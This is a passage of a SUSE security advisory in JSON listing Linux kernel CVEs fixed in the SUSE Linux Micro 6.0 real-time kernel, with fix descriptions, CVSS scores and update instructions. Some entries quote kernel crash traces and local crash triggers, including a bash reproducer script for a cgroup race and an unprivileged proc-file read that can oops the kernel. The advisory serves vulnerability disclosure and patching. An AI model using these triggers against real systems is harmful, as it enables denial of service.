"summary": "CVE-2023-54253",
"url": "https://www.suse.com/security/cve/CVE-2023-54253"
},
{
"category": "external",
"summary": "SUSE Bug 1255891 for CVE-2023-54253",
"url": "https://bugzilla.suse.com/1255891"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54253"
},
{
"cve": "CVE-2023-54254",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54254"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/ttm: Don\u0027t leak a resource on eviction error\n\nOn eviction errors other than -EMULTIHOP we were leaking a resource.\nFix.\n\nv2:\n- Avoid yet another goto (Andi Shyti)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54254",
"url": "https://www.suse.com/security/cve/CVE-2023-54254"
},
{
"category": "external",
"summary": "SUSE Bug 1255890 for CVE-2023-54254",
"url": "https://bugzilla.suse.com/1255890"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54254"
},
{
"cve": "CVE-2023-54255",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54255"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsh: dma: Fix DMA channel offset calculation\n\nVarious SoCs of the SH3, SH4 and SH4A family, which use this driver,\nfeature a differing number of DMA channels, which can be distributed\nbetween up to two DMAC modules. The existing implementation fails to\ncorrectly accommodate for all those variations, resulting in wrong\nchannel offset calculations and leading to kernel panics.\n\nRewrite dma_base_addr() in order to properly calculate channel offsets\nin a DMAC module. Fix dmaor_read_reg() and dmaor_write_reg(), so that\nthe correct DMAC module base is selected for the DMAOR register.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54255",
"url": "https://www.suse.com/security/cve/CVE-2023-54255"
},
{
"category": "external",
"summary": "SUSE Bug 1255884 for CVE-2023-54255",
"url": "https://bugzilla.suse.com/1255884"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54255"
},
{
"cve": "CVE-2023-54258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncifs: fix potential oops in cifs_oplock_break\n\nWith deferred close we can have closes that race with lease breaks,\nand so with the current checks for whether to send the lease response,\noplock_response(), this can mean that an unmount (kill_sb) can occur\njust before we were checking if the tcon-\u003eses is valid. See below:\n\n[Fri Aug 4 04:12:50 2023] RIP: 0010:cifs_oplock_break+0x1f7/0x5b0 [cifs]\n[Fri Aug 4 04:12:50 2023] Code: 7d a8 48 8b 7d c0 c0 e9 02 48 89 45 b8 41 89 cf e8 3e f5 ff ff 4c 89 f7 41 83 e7 01 e8 82 b3 03 f2 49 8b 45 50 48 85 c0 74 5e \u003c48\u003e 83 78 60 00 74 57 45 84 ff 75 52 48 8b 43 98 48 83 eb 68 48 39\n[Fri Aug 4 04:12:50 2023] RSP: 0018:ffffb30607ddbdf8 EFLAGS: 00010206\n[Fri Aug 4 04:12:50 2023] RAX: 632d223d32612022 RBX: ffff97136944b1e0 RCX: 0000000080100009\n[Fri Aug 4 04:12:50 2023] RDX: 0000000000000001 RSI: 0000000080100009 RDI: ffff97136944b188\n[Fri Aug 4 04:12:50 2023] RBP: ffffb30607ddbe58 R08: 0000000000000001 R09: ffffffffc08e0900\n[Fri Aug 4 04:12:50 2023] R10: 0000000000000001 R11: 000000000000000f R12: ffff97136944b138\n[Fri Aug 4 04:12:50 2023] R13: ffff97149147c000 R14: ffff97136944b188 R15: 0000000000000000\n[Fri Aug 4 04:12:50 2023] FS: 0000000000000000(0000) GS:ffff9714f7c00000(0000) knlGS:0000000000000000\n[Fri Aug 4 04:12:50 2023] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[Fri Aug 4 04:12:50 2023] CR2: 00007fd8de9c7590 CR3: 000000011228e000 CR4: 0000000000350ef0\n[Fri Aug 4 04:12:50 2023] Call Trace:\n[Fri Aug 4 04:12:50 2023] \u003cTASK\u003e\n[Fri Aug 4 04:12:50 2023] process_one_work+0x225/0x3d0\n[Fri Aug 4 04:12:50 2023] worker_thread+0x4d/0x3e0\n[Fri Aug 4 04:12:50 2023] ? process_one_work+0x3d0/0x3d0\n[Fri Aug 4 04:12:50 2023] kthread+0x12a/0x150\n[Fri Aug 4 04:12:50 2023] ? set_kthread_struct+0x50/0x50\n[Fri Aug 4 04:12:50 2023] ret_from_fork+0x22/0x30\n[Fri Aug 4 04:12:50 2023] \u003c/TASK\u003e\n\nTo fix this change the ordering of the checks before sending the oplock_response\nto first check if the openFileList is empty.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54258",
"url": "https://www.suse.com/security/cve/CVE-2023-54258"
},
{
"category": "external",
"summary": "SUSE Bug 1255886 for CVE-2023-54258",
"url": "https://bugzilla.suse.com/1255886"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54258"
},
{
"cve": "CVE-2023-54261",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54261"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdkfd: Add missing gfx11 MQD manager callbacks\n\nmqd_stride function was introduced in commit 2f77b9a242a2\n(\"drm/amdkfd: Update MQD management on multi XCC setup\")\nbut not assigned for gfx11. Fixes a NULL dereference in debugfs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54261",
"url": "https://www.suse.com/security/cve/CVE-2023-54261"
},
{
"category": "external",
"summary": "SUSE Bug 1255879 for CVE-2023-54261",
"url": "https://bugzilla.suse.com/1255879"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54261"
},
{
"cve": "CVE-2023-54263",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54263"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/nouveau/kms/nv50-: init hpd_irq_lock for PIOR DP\n\nFixes OOPS on boards with ANX9805 DP encoders.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54263",
"url": "https://www.suse.com/security/cve/CVE-2023-54263"
},
{
"category": "external",
"summary": "SUSE Bug 1255883 for CVE-2023-54263",
"url": "https://bugzilla.suse.com/1255883"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54263"
},
{
"cve": "CVE-2023-54264",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54264"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/sysv: Null check to prevent null-ptr-deref bug\n\nsb_getblk(inode-\u003ei_sb, parent) return a null ptr and taking lock on\nthat leads to the null-ptr-deref bug.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54264",
"url": "https://www.suse.com/security/cve/CVE-2023-54264"
},
{
"category": "external",
"summary": "SUSE Bug 1255872 for CVE-2023-54264",
"url": "https://bugzilla.suse.com/1255872"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54264"
},
{
"cve": "CVE-2023-54266",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54266"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: dvb-usb: m920x: Fix a potential memory leak in m920x_i2c_xfer()\n\n\u0027read\u0027 is freed when it is known to be NULL, but not when a read error\noccurs.\n\nRevert the logic to avoid a small leak, should a m920x_read() call fail.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54266",
"url": "https://www.suse.com/security/cve/CVE-2023-54266"
},
{
"category": "external",
"summary": "SUSE Bug 1255875 for CVE-2023-54266",
"url": "https://bugzilla.suse.com/1255875"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54266"
},
{
"cve": "CVE-2023-54267",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54267"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/pseries: Rework lppaca_shared_proc() to avoid DEBUG_PREEMPT\n\nlppaca_shared_proc() takes a pointer to the lppaca which is typically\naccessed through get_lppaca(). With DEBUG_PREEMPT enabled, this leads\nto checking if preemption is enabled, for example:\n\n BUG: using smp_processor_id() in preemptible [00000000] code: grep/10693\n caller is lparcfg_data+0x408/0x19a0\n CPU: 4 PID: 10693 Comm: grep Not tainted 6.5.0-rc3 #2\n Call Trace:\n dump_stack_lvl+0x154/0x200 (unreliable)\n check_preemption_disabled+0x214/0x220\n lparcfg_data+0x408/0x19a0\n ...\n\nThis isn\u0027t actually a problem however, as it does not matter which\nlppaca is accessed, the shared proc state will be the same.\nvcpudispatch_stats_procfs_init() already works around this by disabling\npreemption, but the lparcfg code does not, erroring any time\n/proc/powerpc/lparcfg is accessed with DEBUG_PREEMPT enabled.\n\nInstead of disabling preemption on the caller side, rework\nlppaca_shared_proc() to not take a pointer and instead directly access\nthe lppaca, bypassing any potential preemption checks.\n\n[mpe: Rework to avoid needing a definition in paca.h and lppaca.h]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54267",
"url": "https://www.suse.com/security/cve/CVE-2023-54267"
},
{
"category": "external",
"summary": "SUSE Bug 1255899 for CVE-2023-54267",
"url": "https://bugzilla.suse.com/1255899"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 0,
"baseSeverity": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54267"
},
{
"cve": "CVE-2023-54271",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54271"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-cgroup: Fix NULL deref caused by blkg_policy_data being installed before init\n\nblk-iocost sometimes causes the following crash:\n\n BUG: kernel NULL pointer dereference, address: 00000000000000e0\n ...\n RIP: 0010:_raw_spin_lock+0x17/0x30\n Code: be 01 02 00 00 e8 79 38 39 ff 31 d2 89 d0 5d c3 0f 1f 00 0f 1f 44 00 00 55 48 89 e5 65 ff 05 48 d0 34 7e b9 01 00 00 00 31 c0 \u003cf0\u003e 0f b1 0f 75 02 5d c3 89 c6 e8 ea 04 00 00 5d c3 0f 1f 84 00 00\n RSP: 0018:ffffc900023b3d40 EFLAGS: 00010046\n RAX: 0000000000000000 RBX: 00000000000000e0 RCX: 0000000000000001\n RDX: ffffc900023b3d20 RSI: ffffc900023b3cf0 RDI: 00000000000000e0\n RBP: ffffc900023b3d40 R08: ffffc900023b3c10 R09: 0000000000000003\n R10: 0000000000000064 R11: 000000000000000a R12: ffff888102337000\n R13: fffffffffffffff2 R14: ffff88810af408c8 R15: ffff8881070c3600\n FS: 00007faaaf364fc0(0000) GS:ffff88842fdc0000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 00000000000000e0 CR3: 00000001097b1000 CR4: 0000000000350ea0\n Call Trace:\n \u003cTASK\u003e\n ioc_weight_write+0x13d/0x410\n cgroup_file_write+0x7a/0x130\n kernfs_fop_write_iter+0xf5/0x170\n vfs_write+0x298/0x370\n ksys_write+0x5f/0xb0\n __x64_sys_write+0x1b/0x20\n do_syscall_64+0x3d/0x80\n entry_SYSCALL_64_after_hwframe+0x46/0xb0\n\nThis happens because iocg-\u003eioc is NULL. The field is initialized by\nioc_pd_init() and never cleared. The NULL deref is caused by\nblkcg_activate_policy() installing blkg_policy_data before initializing it.\n\nblkcg_activate_policy() was doing the following:\n\n1. Allocate pd\u0027s for all existing blkg\u0027s and install them in blkg-\u003epd[].\n2. Initialize all pd\u0027s.\n3. Online all pd\u0027s.\n\nblkcg_activate_policy() only grabs the queue_lock and may release and\nre-acquire the lock as allocation may need to sleep. ioc_weight_write()\ngrabs blkcg-\u003elock and iterates all its blkg\u0027s. The two can race and if\nioc_weight_write() runs during #1 or between #1 and #2, it can encounter a\npd which is not initialized yet, leading to crash.\n\nThe crash can be reproduced with the following script:\n\n #!/bin/bash\n\n echo +io \u003e /sys/fs/cgroup/cgroup.subtree_control\n systemd-run --unit touch-sda --scope dd if=/dev/sda of=/dev/null bs=1M count=1 iflag=direct\n echo 100 \u003e /sys/fs/cgroup/system.slice/io.weight\n bash -c \"echo \u00278:0 enable=1\u0027 \u003e /sys/fs/cgroup/io.cost.qos\" \u0026\n sleep .2\n echo 100 \u003e /sys/fs/cgroup/system.slice/io.weight\n\nwith the following patch applied:\n\n\u003e diff --git a/block/blk-cgroup.c b/block/blk-cgroup.c\n\u003e index fc49be622e05..38d671d5e10c 100644\n\u003e --- a/block/blk-cgroup.c\n\u003e +++ b/block/blk-cgroup.c\n\u003e @@ -1553,6 +1553,12 @@ int blkcg_activate_policy(struct gendisk *disk, const struct blkcg_policy *pol)\n\u003e \t\tpd-\u003eonline = false;\n\u003e \t}\n\u003e\n\u003e + if (system_state == SYSTEM_RUNNING) {\n\u003e + spin_unlock_irq(\u0026q-\u003equeue_lock);\n\u003e + ssleep(1);\n\u003e + spin_lock_irq(\u0026q-\u003equeue_lock);\n\u003e + }\n\u003e +\n\u003e \t/* all allocated, init in the same order */\n\u003e \tif (pol-\u003epd_init_fn)\n\u003e \t\tlist_for_each_entry_reverse(blkg, \u0026q-\u003eblkg_list, q_node)\n\nI don\u0027t see a reason why all pd\u0027s should be allocated, initialized and\nonlined together. The only ordering requirement is that parent blkgs to be\ninitialized and onlined before children, which is guaranteed from the\nwalking order. Let\u0027s fix the bug by allocating, initializing and onlining pd\nfor each blkg and holding blkcg-\u003elock over initialization and onlining. This\nensures that an installed blkg is always fully initialized and onlined\nremoving the the race window.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54271",
"url": "https://www.suse.com/security/cve/CVE-2023-54271"
},
{
"category": "external",
"summary": "SUSE Bug 1255902 for CVE-2023-54271",
"url": "https://bugzilla.suse.com/1255902"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54271"
},
{
"cve": "CVE-2023-54276",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54276"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfsd: move init of percpu reply_cache_stats counters back to nfsd_init_net\n\nCommit f5f9d4a314da (\"nfsd: move reply cache initialization into nfsd\nstartup\") moved the initialization of the reply cache into nfsd startup,\nbut didn\u0027t account for the stats counters, which can be accessed before\nnfsd is ever started. The result can be a NULL pointer dereference when\nsomeone accesses /proc/fs/nfsd/reply_cache_stats while nfsd is still\nshut down.\n\nThis is a regression and a user-triggerable oops in the right situation:\n\n- non-x86_64 arch\n- /proc/fs/nfsd is mounted in the namespace\n- nfsd is not started in the namespace\n- unprivileged user calls \"cat /proc/fs/nfsd/reply_cache_stats\"\n\nAlthough this is easy to trigger on some arches (like aarch64), on\nx86_64, calling 